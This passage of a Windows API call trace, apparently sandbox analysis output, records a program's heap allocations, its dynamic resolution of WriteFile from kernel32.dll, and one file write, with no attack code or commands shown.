returned 1 [0180.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0180.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0180.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0180.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0180.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0180.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0180.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0180.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0180.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0180.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0180.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0180.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0180.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0180.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0180.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0180.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0180.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0180.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0180.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0180.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0180.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0180.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0180.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0180.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0180.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0180.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0180.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0180.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0180.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0180.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0180.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0180.050] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0180.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0180.050] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0180.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0180.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0180.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0180.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1970 [0180.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0180.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0180.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0180.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0180.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b60 [0180.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0180.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0180.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0180.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0180.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0180.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0180.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc168 [0180.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0180.051] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0180.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0180.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0180.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0180.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc168 | out: hHeap=0x8a0000) returned 1 [0180.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0180.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0180.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0180.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0180.051] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1a30 [0180.051] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0180.051] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0180.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0180.051] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b70 [0180.051] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0180.051] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba0c0 [0180.051] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0180.051] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0180.051] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0180.051] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0180.051] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0180.051] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0180.051] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0180.051] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0180.051] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0180.051] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0180.051] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0180.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0180.051] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0180.052] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0180.052] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0180.052] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0180.052] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0180.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0180.052] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0180.052] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0180.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0180.052] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0180.052] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0180.052] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0180.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0180.052] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0180.052] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0180.052] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0180.052] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0180.052] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0180.052] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0180.052] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0180.052] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0180.052] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0180.052] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0180.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0180.052] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0180.052] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0180.052] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0180.052] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0180.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0180.052] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0180.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0180.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0180.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0180.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0180.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0180.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0180.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0180.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0180.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0180.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0180.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0180.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0180.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0180.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0180.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0180.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0180.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0180.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0180.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0180.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0180.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0180.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0180.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0180.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0180.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0180.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0180.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0180.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0180.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0180.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0180.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0180.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0180.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0180.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0180.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0180.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0180.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0180.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0180.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0180.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0180.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0180.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0180.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0180.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0180.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0180.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0180.054] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0180.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0180.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0180.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0180.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0180.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0180.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0180.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0180.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0180.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0180.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0180.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0180.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0180.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0180.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0180.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0180.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0180.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0180.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0180.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0180.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0180.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0180.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0180.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0180.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0180.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0180.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0180.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0180.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0180.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0180.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0180.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0180.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0180.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0180.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0180.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0180.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0180.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0180.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0180.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0180.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0180.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0180.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0180.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0180.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0180.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0180.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0180.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0180.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0180.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0180.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0180.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0180.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0180.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0180.056] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0180.056] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0180.056] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x9bda50, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0180.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0180.057] GetProcAddress (hModule=0x75990000, lpProcName="WriteFile") returned 0x759a1282 [0180.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0180.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0180.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0180.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0180.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0180.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0180.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0180.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0180.057] WriteFile (in: hFile=0x138, lpBuffer=0x8fff00*, nNumberOfBytesToWrite=0x4505, lpNumberOfBytesWritten=0x87eae0, lpOverlapped=0x0 | out: lpBuffer=0x8fff00*, lpNumberOfBytesWritten=0x87eae0*=0x4505, lpOverlapped=0x0) returned 1 [0180.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0180.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0180.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0180.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0180.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0180.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0180.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0180.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0180.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0180.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0180.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0180.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0180.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0180.057] HeapFree (in: hHeap=0x8a0000, 